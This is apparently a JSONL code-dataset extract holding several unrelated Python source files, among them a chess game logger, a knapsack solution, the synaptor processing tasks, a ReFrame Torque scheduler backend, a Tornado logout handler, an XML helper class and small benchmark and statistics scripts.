self.log_num_player_pieces = []\n\n self.b_num_irregular = kwargs.get('b_num_irregular', False) or _all\n self.log_num_irregular = []\n\n self.b_num_king_moves = kwargs.get('b_num_king_moves', False) or _all\n self.log_num_king_moves = []\n \n self.b_turn_time = kwargs.get('b_turn_time',False)\n self.log_turn_time = []\n self.t0 = time.time()\n\n \n\n def set_t0(self):\n self.t0 = time.time()\n\n def add_turn_log(self\n ,move\n ,moves\n ,pieces\n ,player\n ,b_check = False\n ):\n \n '''each turn append a data element on to each of these logs'''\n\n if self.b_log_move:\n self.log_move.append(move)\n \n if self.b_num_available:\n self.log_num_available.append(len(moves))\n\n if self.b_check_schedule:\n self.log_check_schedule.append(b_check)\n\n if self.b_num_pieces:\n num_pieces = len(pieces)\n self.log_num_pieces.append(num_pieces)\n\n if self.b_num_player_pieces:\n num_player_pieces = len([p for p in pieces if p.white==player])\n self.log_num_player_pieces.append(num_player_pieces)\n\n if self.b_num_irregular:\n num_irregular = 0 #len(filter(lambda m: m.move_code != \"REGULAR\", moves))\n self.log_num_irregular.append(num_irregular)\n\n if self.b_num_king_moves:\n num_king_moves = 0 \n self.log_num_king_moves.append(num_king_moves)\n \n if self.b_turn_time:\n _time = time.time() - self.t0\n self.log_turn_time.append(_time)\n self.t0 = time.time()\n\n\n def get_log_move(self):\n return copy.deepcopy(self.log_move)\n\n def get_log_num_available(self):\n return copy.deepcopy(self.log_num_available)\n\n def get_log_turn_time(self):\n return copy.deepcopy(self.log_turn_time)\n\n def get_log_check_schedule(self):\n return copy.copy(self.log_check_schedule)\n\n def get_log_num_pieces(self):\n return copy.copy(self.log_num_pieces)\n\n def 
get_log_num_player_pieces(self):\n        return copy.copy(self.log_num_player_pieces)\n\n    def get_log_num_irregular(self):\n        return copy.copy(self.log_num_irregular)\n\n    \n    \n","sub_path":"basic_engine/src/GameLog.py","file_name":"GameLog.py","file_ext":"py","file_size_in_byte":11531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"119470407","text":"N = int(input()) # number of people\na = [0] + list(map(int,input().split())) # stamina lost per person\nb = [0] + list(map(int,input().split())) # joy gained per person\ndp = [[0]*100 for _ in range(N+1)]\nfor i in range(1,N+1) :\n    for j in range(100) :\n        if j+a[i] < 100 :\n            dp[i][j+a[i]] = dp[i-1][j] + b[i]\n        if dp[i][j] < dp[i-1][j] :\n            dp[i][j] = dp[i-1][j]\nprint(dp[N][99])\n","sub_path":"안녕.py","file_name":"안녕.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"579102646","text":"adressbuch = [{'Vorname':'Max', 'Nachname':'Mustermann', 'Hobbies': ('Schwimmen','Tanzen','Lesen'), 'Alter': 43,\n              'Eigenschaften' : {'Geschicklichkeit': 10, 'IQ':98, 'Gewicht':88, 'Haarfarbe':'blond'},'Geschlecht':'männlich'}]\n\nIQ = adressbuch [0] ['Eigenschaften'] ['IQ']\n\nprint (IQ)\n\n\nnumber_hobbies = len(adressbuch [0] ['Hobbies'])\n\nprint (number_hobbies)\n\nadressbuch.append ({'Vorname':'Pia', 'Nachname': 'Musterfrau', 'Alter': 34, 'Geschlecht': 'w', 'Hobbies': ('Wandern', 'Tanzen', 'Skydiving'),\n                    'Eigenschaften': {'Geschicklichkeit' : 9, 'IQ' : 102, 'Gewicht' : 68, 'Haarfarbe' : 'brünett'}, 'Organisationen' : 'PyLadies'})\n\nlength_adress= len(adressbuch)\n\nprint (length_adress)","sub_path":"CBTJ/Aufgabe2.py","file_name":"Aufgabe2.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"151965531","text":"#!/usr/bin/env python3\n__doc__ = \"\"\"\nSynaptor Processing Tasks\n\"\"\"\n\nimport time\n\nfrom .. import io\nfrom .. import types\nfrom .. import seg_utils\n\nfrom . import chunk_ccs\nfrom . import merge_ccs\nfrom . import chunk_edges\nfrom . import merge_edges\nfrom . import chunk_overlaps\nfrom . 
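The dynamic program above treats each person as a 0/1-knapsack item with stamina cost a[i] and joy value b[i], capped at 99 total stamina. A standalone sketch with the usual 1-D space optimisation (iterating the budget in reverse so each item is used at most once):

def max_joy(costs, joys, stamina_cap=99):
    # dp[j] = best joy achievable spending at most j stamina.
    dp = [0] * (stamina_cap + 1)
    for a, b in zip(costs, joys):
        for j in range(stamina_cap, a - 1, -1):  # reverse: use each person once
            dp[j] = max(dp[j], dp[j - a] + b)
    return dp[stamina_cap]

print(max_joy([1, 21, 79], [20, 30, 25]))  # -> 50 (take the first two people)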
import merge_overlaps\n\n\ndef timed(fn_desc, fn, *args, **kwargs):\n \"\"\" Measures the execution time of the passed fn \"\"\"\n print(\"{fn_desc}\".format(fn_desc=fn_desc))\n start = time.time()\n result = fn(*args, **kwargs)\n print(\"{fn_desc} complete in {t:.3f}s\".format(fn_desc=fn_desc,\n t=time.time()-start))\n return result\n\n\ndef chunk_ccs_task(net_output, chunk_begin, chunk_end,\n cc_thresh, sz_thresh):\n \"\"\"\n - Performs connected components over a chunk of data\n - Extracts clefts that possibly continue to the next chunk (continuations)\n - Filters out any complete segments under the size threshold\n - Records the centroid, size, and bounding box for the surviving\n clefts in a DataFrame\n\n Returns:\n - Cleft Components (3d np array)\n - Continuations for the chunk\n - DataFrame of cleft info\n \"\"\"\n chunk_bounds = types.BBox3d(chunk_begin, chunk_end)\n\n #Processing\n ccs = timed(\"Running connected components\",\n chunk_ccs.connected_components3d,\n net_output, cc_thresh).astype(\"uint32\")\n\n\n continuations = timed(\"Extracting continuations\",\n types.continuation.extract_all_continuations,\n ccs)\n cont_ids = set(cont.segid for cont in continuations)\n\n\n ccs, sizes = timed(\"Filtering complete segments by size\",\n seg_utils.filter_segs_by_size,\n ccs, sz_thresh, to_ignore=cont_ids)\n\n\n offset = chunk_bounds.min()\n centers = timed(\"Computing cleft centroids\",\n seg_utils.centers_of_mass,\n ccs, offset=offset)\n bboxes = timed(\"Computing cleft bounding boxes\",\n seg_utils.bounding_boxes,\n ccs, offset=offset)\n\n cleft_info = timed(\"Making cleft info DataFrame\",\n chunk_ccs.make_cleft_info_dframe,\n centers, sizes, bboxes)\n\n return ccs, continuations, cleft_info\n\n\ndef merge_ccs_task(cont_info_arr, cleft_info_arr, chunk_bounds,\n size_thr, max_face_shape):\n \"\"\"\n -Assigns a global set of cleft segment ids\n -Finds which continuations match across chunks\n -Makes an id mapping that merges the matching continuations for each chunk\n -Merges the cleft info dataframes into one for the entire dataset\n -Maps any newly merged cleft segments to 0 if they're under the\n size threshold\n\n Returns:\n -A single DataFrame for all merged clefts\n -A nparray of id maps for each chunk\n \"\"\"\n\n cons_cleft_info, chunk_id_maps = timed(\"Consolidating cleft dataframes\",\n merge_ccs.consolidate_cleft_info_arr,\n cleft_info_arr)\n\n cont_info_arr = timed(\"Applying chunk_id_maps to continuations\",\n merge_ccs.apply_chunk_id_maps,\n cont_info_arr, chunk_id_maps)\n\n cont_id_map = timed(\"Merging connected continuations\",\n merge_ccs.merge_connected_continuations,\n cont_info_arr, max_face_shape)\n\n chunk_id_maps = timed(\"Updating chunk id maps\",\n merge_ccs.update_chunk_id_maps,\n chunk_id_maps, cont_id_map)\n\n cons_cleft_info = timed(\"Merging cleft dataframes\",\n merge_ccs.merge_cleft_df,\n cons_cleft_info, cont_id_map)\n\n size_thr_map = timed(\"Enforcing size threshold over merged ccs\",\n merge_ccs.enforce_size_threshold,\n cons_cleft_info, size_thr)\n\n chunk_id_maps = timed(\"Updating chunk id maps (for size thresholding)\",\n merge_ccs.update_chunk_id_maps,\n chunk_id_maps, size_thr_map)\n\n return cons_cleft_info, chunk_id_maps\n\n\ndef chunk_edges_task(img, clefts, seg, asynet,\n chunk_begin, chunk_end, patchsz,\n wshed=None, num_samples_per_cleft=2,\n dil_param=5, id_map=None):\n \"\"\"\n -Applies an id map to a chunk (if passed)\n NOTE: Modifies the clefts array if id_map exists\n -Applies an assignment network to each cleft in the chunk\n 
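The timed helper above is a pass-through profiler: it prints the description, calls fn(*args, **kwargs), prints the elapsed wall-clock time in the '{fn_desc} complete in {t:.3f}s' format, and returns the result unchanged. Using it with any plain callable:

total = timed('Summing a large range', sum, range(10**7))
# prints the description before and after the call; total holds the sum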
-Computes the sizes of each cleft to assist later thresholding\n    -Returns all of the computed information in a DataFrame\n\n    Returns:\n     -A DataFrame of info for each edge within this chunk\n    \"\"\"\n\n    chunk_bounds = types.BBox3d(chunk_begin, chunk_end)\n\n    if id_map is not None:\n        clefts = timed(\"Remapping cleft ids\",\n                       seg_utils.relabel_data,\n                       clefts, id_map, copy=False)\n\n    offset = chunk_bounds.min()\n    edges = timed(\"Inferring edges\",\n                  chunk_edges.infer_edges,\n                  asynet, img, clefts, seg,\n                  offset, patchsz, samples_per_cleft=num_samples_per_cleft,\n                  wshed=wshed, dil_param=dil_param)\n\n    edges = timed(\"Computing cleft size and adding to edge dframe\",\n                  chunk_edges.add_cleft_sizes,\n                  edges, clefts)\n\n    return edges\n\n\ndef merge_edges_task(edges_arr, merged_cleft_info,\n                     voxel_res, dist_thr, size_thr):\n    \"\"\"\n    -Maps together any edges that connect the same partners\n     and are within some distance apart\n    -Maps any newly merged cleft segments to 0 if they're under the\n     size threshold\n\n    Returns:\n    -Combined cleft & edge dataframe\n    -An id map that implements the duplicate and size mapping\n    -A merged edge dataframe (mostly for debugging along with #1)\n    \"\"\"\n\n    merged_edge_df = timed(\"Merging edges\",\n                           merge_edges.consolidate_edges1,\n                           edges_arr)\n\n    full_df = timed(\"Merging edge DataFrame to cleft DataFrame\",\n                    merge_edges.merge_to_cleft_df,\n                    merged_cleft_info, merged_edge_df)\n\n    dup_id_map = timed(\"Merging duplicate clefts\",\n                       merge_edges.merge_duplicate_clefts2,\n                       full_df, dist_thr, voxel_res)\n\n    full_df = timed(\"Merging duplicates within full dataframe\",\n                    merge_edges.merge_full_df1,\n                    full_df, dup_id_map)\n\n    size_thr_map = timed(\"Enforcing size threshold over merged ccs\",\n                         merge_ccs.enforce_size_threshold,\n                         full_df, size_thr)\n\n    merged_id_map = timed(\"Updating duplicate id map with size threshold map\",\n                          merge_edges.update_id_map,\n                          dup_id_map, size_thr_map)\n\n    return full_df, merged_id_map, merged_edge_df\n\n\ndef chunk_overlaps_task(segs_of_interest, base_segs):\n    \"\"\"\n    -Determines which segments of interest overlap with\n     which base segs, returns the overlap matrix\n    \"\"\"\n    return timed(\"Counting overlaps\",\n                 chunk_overlaps.count_overlaps,\n                 segs_of_interest, base_segs)\n\n\ndef merge_overlaps_task(overlaps_arr):\n    \"\"\"\n    -Merges the chunk overlap matrices into one,\n    -Returns a mapping from segment to base segment of max overlap\n    \"\"\"\n    full_overlap = timed(\"Merging overlap matrices\",\n                         merge_overlaps.consolidate_overlaps,\n                         overlaps_arr)\n\n    return timed(\"Finding segments with maximal overlap\",\n                 merge_overlaps.find_max_overlaps,\n                 full_overlap)\n\n\ndef remap_ids_task(clefts, *id_maps, copy=False):\n    \"\"\"\n    -Maps the ids within clefts according to a list of id_maps\n    NOTE: id maps will be applied in the order listed as args\n\n    Returns:\n    -Remapped clefts\n    \"\"\"\n\n    id_map = id_maps[0]\n    for (i,next_map) in enumerate(id_maps[1:]):\n        id_map = timed(\"Updating id map: round {i}\".format(i=i+1),\n                       merge_edges.update_id_map,\n                       id_map, next_map, reused_ids=True)\n\n    clefts = timed(\"Relabeling data by id map\",\n                   seg_utils.relabel_data,\n                   clefts, id_map, copy=copy)\n\n    return clefts
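\n\n\n# Example of chaining id maps (an added sketch, not part of the original module;\n# chunk_map and dedup_map stand in for hypothetical id maps from earlier tasks):\n#   clefts = remap_ids_task(clefts, chunk_map, dedup_map, copy=True)\n# which updates chunk_map with dedup_map and then relabels the volume once.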
\n","sub_path":"synaptor/proc_tasks/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":8431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"577766654","text":"import pytest\r\nimport time\r\nimport sys\r\nfrom os.path import dirname, abspath\r\nsys.path.insert(0, dirname(dirname(abspath(__file__))))\r\nfrom page_obj.scg.scg_def_sys import *\r\nfrom page_obj.scg.scg_def import *\r\nfrom page_obj.scg.scg_button import *\r\nfrom page_obj.scg.scg_def_log import *\r\nfrom page_obj.common.rail import *\r\nfrom page_obj.scg.scg_dev import *\r\nfrom page_obj.scg.scg_def_ifname_OEM import *\r\ntest_id = 139342\r\n# this test has not passed yet\r\n\r\ndef test_c139342(browser):\r\n\ttry:\r\n\t\t# log in to the device\r\n\t\tlogin_web(browser, url=dev1)\r\n\t\tconfiguer(browser)\r\n\t\tloginfo = get_log(browser, 管理日志)\r\n\t\t# print(loginfo)\r\n\r\n\t\ttry:\r\n\t\t\tassert \"修改\" in loginfo  # \"modified\"\r\n\t\t\tassert \"设置成功\" in loginfo  # \"set successfully\"\r\n\t\t\trail_pass(test_run_id, test_id)\r\n\r\n\t\texcept:\r\n\t\t\trail_fail(test_run_id, test_id)\r\n\t\t\tassert \"修改\" in loginfo\r\n\t\t\tassert \"设置成功\" in loginfo\r\n\r\n\t\tsys_set_jyl(browser)\r\n\t\tfor x in range(1, 5):\r\n\t\t\tbrowser.refresh()\r\n\t\tlogin_web(browser, url=dev1)\r\n\r\n\texcept Exception as err:\r\n\t\t# if any step above fails, reboot the device and restore the configuration\r\n\t\tprint(err)\r\n\t\treload(hostip=dev1)\r\n\t\treload(hostip=dev1, port=33)\r\n\t\trail_fail(test_run_id, test_id)\r\n\t\tassert False\r\n\r\n\r\ndef configuer(browser):\r\n\tsys_set_jyl(browser, ssh_port=\"33\", ssh_timeout=\"86400\", https_port=\"446\", https_timeout=\"86400\",\r\n\t            telent_port=\"23\", telent_timeout=\"86400\", console_timeout=\"86400\", frozen_time=\"600\",\r\n\t            expire_time=\"600\", retry=\"3\")\r\n\t# time.sleep(30)\r\n\tfor x in range(1, 5):\r\n\t\tbrowser.refresh()\r\n\ttime.sleep(2)\r\n\tlogin_web(browser, url=dev1+str(\":446\"))\r\n\r\n\r\nif __name__ == '__main__':\r\n\tpytest.main([\"-v\", \"-s\", \"test_c\" + str(test_id) + \".py\"])","sub_path":"pyautoTest-master(ICF-7.5.0)/test_case/scg/scg_Administrator/test_c139342.py","file_name":"test_c139342.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"508150551","text":"infile = open('jaberwocky.txt', 'r')\ninputtemp = infile.readlines()\ninfile.close()\ninputtempnumberoflines = len(inputtemp)\nprint(inputtempnumberoflines)\noutputtemp=[]\nfor i in range(1, inputtempnumberoflines, 2):\n    outputtemp.append(inputtemp[i])\nprint(outputtemp)\noutputtempnumberoflines = len(outputtemp)\nf = open('output.txt', 'w')\nfor i in range(0,outputtempnumberoflines):\n    f.write(outputtemp[i])\nf.close()
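\n\n# A more idiomatic sketch of the same every-other-line copy (an added note;\n# it assumes the same two filenames and is not part of the original script):\n# with open('jaberwocky.txt') as src, open('output.txt', 'w') as dst:\n#     dst.writelines(src.readlines()[1::2])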
\n","sub_path":"workingwithfiles.py","file_name":"workingwithfiles.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"358420032","text":"## =================\nimport numpy as np\n\nincomes = np.random.normal(27000, 15000, 10000)\nnp.mean(incomes)\n## ==========================================\n#%matplotlib inline\nimport matplotlib.pyplot as plt\nplt.hist(incomes, 50)\nplt.show()\n##==============================================\nnp.median(incomes)\n## If we append, say, one huge outlier to the income list, the median barely moves, but the mean changes a lot.\nincomes = np.append(incomes, [1000000000])\nnp.median(incomes)\nnp.mean(incomes)\n## ===================mode============================\n## mode only works for discrete data\nages = np.random.randint(18, high=90, size=500)\nages\n\nfrom scipy import stats\nstats.mode(ages)\n\n##==============================================================\n## The code that will generate some random e-commerce data; just an array of total amount spent per transaction\n#%matplotlib inline\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nincomes = np.random.normal(100.0, 20.0, 10000)\n\nplt.hist(incomes, 50)\nplt.show()\n##==============================================================\n","sub_path":"3.measures_of_central_tendency.py","file_name":"3.measures_of_central_tendency.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"143853662","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom pandora_world import views\n\nrouter = DefaultRouter()\nrouter.register('companies', views.PandoraCompaniesViewSet)\nrouter.register('people', views.PandoraPeopleViewSet)\nrouter.register('food', views.PandoraFoodViewSet)\n\napp_name = 'pandora'\n\nurlpatterns = [\n    path('', include(router.urls)),\n]","sub_path":"app/pandora_world/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"318014081","text":"'''\nCreated on 19 Sep 2014\n\n@author: Mithat KONUK\n'''\n\n# Set and get information from the XML parser\n\n#!/usr/bin/env python\n\nfrom xml.etree import ElementTree as ET\nimport enum\nfrom enum import getPath\n\n\n \nclass XMLParser():\n    \n    # root : example ....\n    def setRoot(self,nameofRoot):\n        self.root = ET.Element(nameofRoot)\n    \n    def getRoot(self):\n        return self.root\n    \n    ''' \n    parent : element to attach the new subElement to\n    subElement: tag name of the added subElement \n    ssubElementtext (String): text of the subElement \n    attribute : dictionary of the tag attributes \n    \n    \n    return addedSubElement, so further subElements can be added to it \n    Exception : Tag name must be non empty\n    \n    ''' \n    def addSubElement(self,parent,subElement,ssubElementtext,attribute):\n        \n        \n        if subElement == '' or subElement is None:\n            raise Exception('Tag name must be non empty')\n        else : \n            addedSubElement = ET.SubElement(parent,subElement)\n            addedSubElement.text = ssubElementtext\n            \n            for key,value in attribute.iteritems():\n                addedSubElement.set(key,value)\n        \n        return addedSubElement\n    \n    \n    '''\n    tagdict ==> {tag:,text:,attrib...} this format is standard\n    example : { 'tag':'api','text':'WintoFile','os':'win8'}\n    leave a field empty with ''\n    \n    '''\n    def append(self,filename,tagdict):\n        root = ET.parse(filename).getroot()\n        \n        coupleList =[]\n        for key,value in tagdict.iteritems():\n            temp = [key,value]\n            coupleList.append(temp)\n        \n        \n        stagName = ''\n        stextValue =''\n        attributeDict=dict()\n        \n        \n        for list in coupleList:\n            \n            if list[0] == 'tag':\n                stagName = list[1]\n            elif list[0] == 'text':\n                stextValue = list[1]\n            else:\n                # add attrib \n                attributeDict[list[0]] = list[1]\n        \n        if stagName == '' or stagName is None:\n            raise Exception('Empty Tag Expression encountered') # an empty tag name cannot create a tag\n        \n        else:\n            child = ET.Element(stagName)\n            child.text = stextValue\n            \n            for key,value in attributeDict.iteritems():\n                child.set(key,value)\n            \n            root.append(child)\n            tree = ET.ElementTree(root)\n            tree.write(filename) # update xml file\n    \n    \n    # set root and write as a xml file \n    def createXMLFile(self,xmlFileName):\n        tree = ET.ElementTree(self.root)\n        tree.write(xmlFileName)\n    \n    \n    '''\n    return list of tag entries\n    [[tag_text,{attrib}],..]\n    '''\n    def getElementsByTag(self,filename,tag):\n        root = ET.parse(filename).getroot()\n        elementlist = []\n        \n        for element in root.iter(tag):\n            itemlist = []\n            itemlist.append(element.text)\n            itemlist.append(element.attrib)\n            elementlist.append(itemlist)\n        return elementlist\n    \n    \n    '''\n    Return the text values of the matching tags as a list \n    \n    getElementTextByTag ==> []\n    '''    \n    def getElementTextByTag(self,filename,tagName):\n        root = ET.parse(filename).getroot()\n        elementText =[]\n        for element in root.iter(tagName):\n            elementText.append(element.text)\n        \n        return elementText\n    \n    \n    \n    '''\n    return attribute list by tag\n    [{attrib1},{attrib2}]\n    \n    filename : xml file path \n    tag : tag name to match \n    \n    '''    \n    def getElementAttribByTag(self,filename,tag):\n        root = ET.parse(filename)\n        attributeList = []\n        for element in root.iter(tag):\n            attributeList.append(element.attrib) \n        return attributeList \n\n\n\n    \n","sub_path":"lib/xmlparser.py","file_name":"xmlparser.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"253780512","text":"# Copyright 2016-2020 Swiss National Supercomputing Centre (CSCS/ETH Zurich)\n# ReFrame Project Developers. See the top-level LICENSE file for details.\n#\n# SPDX-License-Identifier: BSD-3-Clause\n#\n# Torque backend\n#\n# - Initial version submitted by Samuel Moors, Vrije Universiteit Brussel (VUB)\n#\n\nimport re\nimport os\nfrom datetime import datetime\n\nimport reframe.utility.os_ext as os_ext\nfrom reframe.core.backends import register_scheduler\nfrom reframe.core.exceptions import JobError\nfrom reframe.core.logging import getlogger\nfrom reframe.core.schedulers.pbs import PbsJobScheduler, _run_strict\n\n\nJOB_STATES = {\n    'Q': 'QUEUED',\n    'H': 'HELD',\n    'R': 'RUNNING',\n    'E': 'EXITING',\n    'T': 'MOVED',\n    'W': 'WAITING',\n    'S': 'SUSPENDED',\n    'C': 'COMPLETED',\n}\n\n\n@register_scheduler('torque')\nclass TorqueJobScheduler(PbsJobScheduler):\n    TASKS_OPT = '-l nodes={num_nodes}:ppn={num_cpus_per_node}'\n\n    def _set_nodelist(self, job, nodespec):\n        if job.nodelist is not None:\n            return\n\n        job.nodelist = [x.split('/')[0] for x in nodespec.split('+')]\n        job.nodelist.sort()\n\n    def _update_state(self, job):\n        '''Check the status of the job.'''\n\n        completed = os_ext.run_command('qstat -f %s' % job.jobid)\n\n        # Depending on the configuration, completed jobs will remain on the job\n        # list for a limited time, or be removed upon completion.\n        # If qstat cannot find the jobid, it returns code 153.\n        if completed.returncode == 153:\n            getlogger().debug(\n                'jobid not known by scheduler, assuming job completed'\n            )\n            job.state = 'COMPLETED'\n            return\n\n        if completed.returncode != 0:\n            raise JobError('qstat failed: %s' % completed.stderr, job.jobid)\n\n        nodelist_match = re.search(\n            r'exec_host = (?P<nodespec>[\\S\\t\\n]+)',\n            completed.stdout,\n            re.MULTILINE\n        )\n        if nodelist_match:\n            nodespec = nodelist_match.group('nodespec')\n            nodespec = re.sub(r'[\\n\\t]*', '', nodespec)\n            self._set_nodelist(job, nodespec)\n\n        state_match = re.search(\n            r'^\\s*job_state = (?P<state>[A-Z])', completed.stdout, re.MULTILINE\n        )\n        if not state_match:\n            getlogger().debug(\n                'job state not found (stdout follows)\\n%s' % completed.stdout\n            )\n            return\n\n        state = state_match.group('state')\n        job.state = JOB_STATES[state]\n        if job.state == 'COMPLETED':\n            code_match = re.search(\n                r'^\\s*exit_status = (?P<code>\\d+)',\n                completed.stdout,\n                re.MULTILINE,\n            )\n            if not code_match:\n                return\n\n            job.exitcode = int(code_match.group('code'))\n\n    def finished(self, job):\n        try:\n            self._update_state(job)\n        except JobError as e:\n            # We ignore these exceptions at this point and we simply mark the\n            # job as unfinished.\n            getlogger().debug('ignoring error during polling: 
%s' % e)\n return False\n else:\n if job.max_pending_time and job.state in ['QUEUED',\n 'HELD',\n 'WAITING']:\n if datetime.now() - self._submit_time >= job.max_pending_time:\n self.cancel(job)\n raise JobError('maximum pending time exceeded',\n jobid=job.jobid)\n\n stdout = os.path.join(job.workdir, job.stdout)\n stderr = os.path.join(job.workdir, job.stderr)\n output_ready = os.path.exists(stdout) and os.path.exists(stderr)\n done = self._cancelled or output_ready\n return job.state == 'COMPLETED' and done\n","sub_path":"reframe/core/schedulers/torque.py","file_name":"torque.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"470848636","text":"SERVER_IP = \"127.0.0.1\"\r\nSERVER_PORT = 1234\r\nMAX_CLIENT_NUM = 7\r\nDATABASE_PATH = 'User.db'\r\nBUFFER_SIZE = 512\r\n\r\nMSG_LOGIN = 'login'\r\nMSG_REGISTER = 'create'\r\nMSG_LOGOUT = 'logout'\r\nMSG_CHAT = 'chat'\r\nMSG_INFO = 'info'\r\nMSG_ROLLSTART = 'rollstart'\r\nMSG_ROLL = 'roll'\r\n\r\nSTATE_ONLINE = 1\r\nSTATE_OFFLINE = 0\r\n","sub_path":"PyChatroom/Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"457455528","text":"# Copyright (C) 2016 Hewlett Packard Enterprise Development LP\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
 See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom tornado import gen\nfrom tornado.log import app_log\nimport httplib\nimport userauth\n\nfrom opsrest.handlers import base\nfrom opsrest.exceptions import APIException\nfrom opsrest.utils.utils import redirect_http_to_https\nfrom opsrest.utils.userutils import check_authenticated\n\nclass LogoutHandler(base.BaseHandler):\n\n    # pass the application reference to the handlers\n    def initialize(self, ref_object):\n        self.error_message = None\n\n    # Overwrite BaseHandler's prepare, as LogoutHandler does not\n    # require everything in Base\n    def prepare(self):\n        try:\n            redirect_http_to_https(self)\n\n            app_log.debug(\"Incoming request from %s: %s\",\n                          self.request.remote_ip,\n                          self.request)\n\n            check_authenticated(self, self.request.method)\n\n        except Exception as e:\n            self.on_exception(e)\n            self.finish()\n\n    @gen.coroutine\n    def post(self):\n        try:\n            app_log.debug(\"Executing Logout POST...\")\n\n            userauth.handle_user_logout(self)\n            self.set_status(httplib.OK)\n\n        except APIException as e:\n            self.on_exception(e)\n\n        except Exception as e:\n            self.on_exception(e)\n\n        self.finish()\n","sub_path":"opsrest/handlers/logout.py","file_name":"logout.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"434976463","text":"import timeit\nfrom decimal import Decimal as D\n\n\nlog = open(\"log.txt\", \"w\")\n\n\ndef fix11():\n    a = int(5 ** 7)\n    b = int(7 ** 5)\n    c = int(17 ** 19)\n    d = int(19 ** 17)\n\n    z = a + b\n    x = c + d\n\n    return z, x\n\n\ndef fix12():\n    a = float(1e30)\n    b = float(1e-30)\n    z = a + b\n    return z\n\n\ndef fix13():\n    a = complex(1 + 2j)\n    b = complex(2 - 1j)\n    z = a + b\n    return z\n\n\ndef fix14():\n    a = D(0.33)\n    b = D(1.66)\n    c = D(5 ** 7)\n    d = D(7 ** 5)\n    e = D(19 ** 17)\n    f = D(17 ** 19)\n    z = a + b\n    x = c + d\n    y = e + f\n    return z, x, y\n\n\ndef fix21():\n    a = int(5 ** 7)\n    b = int(7 ** 5)\n    c = int(17 ** 19)\n    d = int(19 ** 17)\n\n    z = a * b\n    x = c * d\n\n    return z, x\n\n\ndef fix22():\n    a = float(1e30)\n    b = float(1e-30)\n    z = a * b\n    return z\n\n\ndef fix23():\n    a = complex(1 + 2j)\n    b = complex(2 - 1j)\n    z = a * b\n    return z\n\n\ndef fix24():\n    a = D(0.33)\n    b = D(1.66)\n    c = D(5 ** 7)\n    d = D(7 ** 5)\n    e = D(19 ** 17)\n    f = D(17 ** 19)\n    z = a * b\n    x = c * d\n    y = e * f\n    return z, x, y\n\n\ndef fix31():\n    a = int(5 ** 7)\n    b = int(7 ** 5)\n    c = int(17 ** 19)\n    d = int(19 ** 17)\n\n    z = a / b\n    x = c / d\n\n    return z, x\n\n\ndef fix32():\n    a = float(1e30)\n    b = float(1e-30)\n    z = a / b\n    return z\n\n\ndef fix33():\n    a = complex(1 + 2j)\n    b = complex(2 - 1j)\n    z = a / b\n    return z\n\n\ndef fix34():\n    a = D(0.33)\n    b = D(1.66)\n    c = D(5 ** 7)\n    d = D(7 ** 5)\n    e = D(19 ** 17)\n    f = D(17 ** 19)\n    z = a / b\n    x = c / d\n    y = e / f\n    return z, x, y\n\n\ndef fix4():\n    s = \"ab\" * 10000 + \"c\"\n    for i in s:\n        if i == \"a\":\n            return True\n        else:\n            return False\n\n\ndef fix5():\n    L = [i for i in range(10000)]\n    for i in L:\n        if i == 0:\n            print(i)\n        if i == 9999:\n            print(i)\n        if i == 10000:\n            print(i)\n\n\nresult = timeit.timeit(\"fix11()\", setup=\"from __main__ import fix11\")\nlog.write(\"SpeedTest11:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix12()\", setup=\"from __main__ import fix12\")\nlog.write(\"SpeedTest12:\")\nlog.write(str(result))\nlog.write(\"\\n\")\n\nresult = timeit.timeit(\"fix13()\", setup=\"from __main__ import 
